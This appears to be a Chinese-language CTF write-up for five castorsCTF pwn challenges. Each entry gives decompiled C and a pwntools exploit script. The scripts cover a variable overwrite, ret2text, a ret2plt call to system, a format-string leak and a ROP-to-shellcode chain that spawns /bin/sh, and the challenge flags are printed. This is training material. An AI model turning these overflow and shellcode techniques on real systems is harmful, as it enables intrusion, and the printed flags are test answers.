abcbof
Description:
nc chals20.cybercastors.com 14424
Solution:
程序保护如下:
Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)
main 函数如下:
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4; // [rsp+0h] [rbp-110h]
char s2; // [rsp+100h] [rbp-10h]
printf("Hello everyone, say your name: ", argv, envp);
gets(&v4);
if ( !strcmp("CyberCastors", &s2) )
get_flag();
puts("You lose!");
return 0;
}
get_flag 函数如下:
void __noreturn get_flag()
{
char v0; // [rsp+7h] [rbp-9h]
FILE *stream; // [rsp+8h] [rbp-8h]
stream = fopen("flag.txt", "r");
if ( !stream )
exit(1);
while ( 1 )
{
v0 = fgetc(stream);
if ( v0 == -1 )
break;
putchar(v0);
}
fclose(stream);
exit(0);
}
解题思路:
覆盖变量漏洞
exp 如下:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
debug = 1
context(arch='amd64', endian='el', os='linux')
context.log_level = 'debug'
if debug == 1:
p = process(['./chall'])
else:
p = remote('chals20.cybercastors.com', 14424)
pd = '\x00' * 0x100
pd += 'CyberCastors'
p.sendlineafter('name: ', pd)
p.interactive()
Flag:
castorsCTF{b0f_4r3_n0t_th4t_h4rd_or_4r3_th3y?}
babybof1
Description:
nc chals20.cybercastors.com 14425
Solution:
程序保护如下:
Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments
main 函数如下:
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4; // [rsp+0h] [rbp-100h]
puts("Welcome to the cybercastors Babybof");
printf("Say your name: ", argv);
return gets(&v4);
}
get_flag 函数如下:
void __noreturn get_flag()
{
char v0; // [rsp+7h] [rbp-9h]
FILE *stream; // [rsp+8h] [rbp-8h]
stream = fopen("flag.txt", "r");
if ( !stream )
exit(1);
while ( 1 )
{
v0 = fgetc(stream);
if ( v0 == -1 )
break;
putchar(v0);
}
fclose(stream);
exit(0);
}
解题思路:
ret2text 没啥说的
exp 如下:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
debug = 1
context(arch='amd64', endian='el', os='linux')
context.log_level = 'debug'
if debug == 1:
p = process(['./chall'])
else:
p = remote('chals20.cybercastors.com', 14425)
elf = ELF('./chall', checksec=False)
addr_get_flag = elf.sym['get_flag']
pd = '\x00' * 0x108
pd += p64(addr_get_flag)
p.sendlineafter('name: ', pd)
p.interactive()
Flag:
castorsCTF{th4t's_c00l_but_c4n_y0u_g3t_4_sh3ll_n0w?}
babybof2
Description:
nc chals20.cybercastors.com 14434
Solution:
程序保护如下:
Arch: i386-32-little RELRO: No RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments
main 函数如下:
int __cdecl main(int argc, const char **argv, const char **envp)
{
puts("Do you really think you can get to the winners table?");
puts("I'll give you one shot at it, what floor is the table at: ");
start();
puts("Yeah that's what I thougt, LOL.\n");
return 0;
}
start 函数如下:
char *start()
{
char s; // [esp+0h] [ebp-48h]
return gets(&s);
}
winnersLevel 函数如下:
signed int __cdecl winnersLevel(int a1)
{
signed int result; // eax
if ( a1 != 386 && a1 != 258 )
{
puts("You guessed right but it seems your badge number isn't on our list.");
result = 0;
}
else
{
puts("Wow! Please excuse me sir I had no idea...here are your chips");
system("cat ./flag.txt");
result = 1;
}
return result;
}
解题思路:
直接 plt_system 加参数读取 flag 就完事
exp 如下:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
debug = 1
context(arch='i386', endian='el', os='linux')
context.log_level = 'debug'
if debug == 1:
p = process(['./chall'])
else:
p = remote('chals20.cybercastors.com', 14434)
elf = ELF('./chall', checksec=False)
plt_system = elf.plt['system']
addr_flag = 0x0804A046
# gdb.attach(p, "b *0x08049228\nc")
pd = 'a' * 0x4c
pd += p32(plt_system)
pd += p32(0)
pd += p32(addr_flag)
p.sendline(pd)
p.interactive()
Flag:
castorsCTF{b0F_s_4r3_V3rry_fuN_4m_l_r1ght}
babyfmt
Description:
nc chals20.cybercastors.com 14426
Solution:
程序保护如下:
Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled
main 函数如下:
int __cdecl main(int argc, const char **argv, const char **envp)
{
FILE *stream; // [rsp+8h] [rbp-218h]
char v5; // [rsp+10h] [rbp-210h]
char s; // [rsp+110h] [rbp-110h]
unsigned __int64 v7; // [rsp+218h] [rbp-8h]
v7 = __readfsqword(0x28u);
stream = fopen("flag.txt", "r");
if ( !stream )
exit(1);
__isoc99_fscanf(stream, "%s", &v5);
fclose(stream);
printf("Hello everyone, this is babyfmt! say something: ");
fgets(&s, 255, _bss_start);
printf(&s, 255LL);
return 0;
}
解题思路:
不知道为啥远程还有 \r,本地和远程脚本反正不是很一样
这题拿 %lx 泄露字符串就行
exp 如下:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
import binascii
debug = 2
context(arch='i386', endian='el', os='linux')
context.log_level = 'debug'
if debug == 1:
p = process(['./chall'])
else:
p = remote('chals20.cybercastors.com', 14426)
pd = ''
for i in range(8, 0x10):
pd += '%' + str(i) + '$lx.tmp'
p.sendline(pd)
p.recvuntil('tmp\r\n')
res = []
for i in range(0, 8):
res.append(binascii.unhexlify(p.recvuntil('.tmp')[:-4].rjust(0x10, '0'))[::-1])
print ''.join(res)
p.interactive()
Flag:
castorsCTF{l34k_l34k_th4t_f0rm4t_str1n6_l34k}
babybof1 pt2
Description:
nc chals20.cybercastors.com 14425
Solution:
程序保护如下:
Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments
main 函数如下:
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4; // [rsp+0h] [rbp-100h]
puts("Welcome to the cybercastors Babybof");
printf("Say your name: ", argv);
return gets(&v4);
}
get_flag 函数如下:
void __noreturn get_flag()
{
char v0; // [rsp+7h] [rbp-9h]
FILE *stream; // [rsp+8h] [rbp-8h]
stream = fopen("flag.txt", "r");
if ( !stream )
exit(1);
while ( 1 )
{
v0 = fgetc(stream);
if ( v0 == -1 )
break;
putchar(v0);
}
fclose(stream);
exit(0);
}
解题思路:
前面那个 flag 说你要尝试拿到 shell,那这道题的 get_flag 函数就没啥用了
ret2libc 好像一开始可以,后来主办方貌似禁了,用 ret2shellcode 也可
exp 如下:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
debug = 2
context(arch='amd64', endian='el', os='linux')
context.log_level = 'debug'
if debug == 1:
p = process(['./chall'])
else:
p = remote('chals20.cybercastors.com', 14425)
elf = ELF('./chall', checksec=False)
plt_gets = elf.plt['gets']
addr_bss = elf.bss()
addr_rop1 = elf.search(asm("pop rdi;ret")).next()
pd = '\x00' * 0x108
pd += p64(addr_rop1)
pd += p64(addr_bss)
pd += p64(plt_gets)
pd += p64(addr_bss)
# gdb.attach(p, "b *0x40078B\nc")
p.sendlineafter('Babybof\r\n', pd)
pd = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"
p.sendline(pd)
p.interactive()
Flag:
castorsCTF{w0w_U_jU5t_h4ck3d_th15!!1_c4ll_th3_c0p5!11}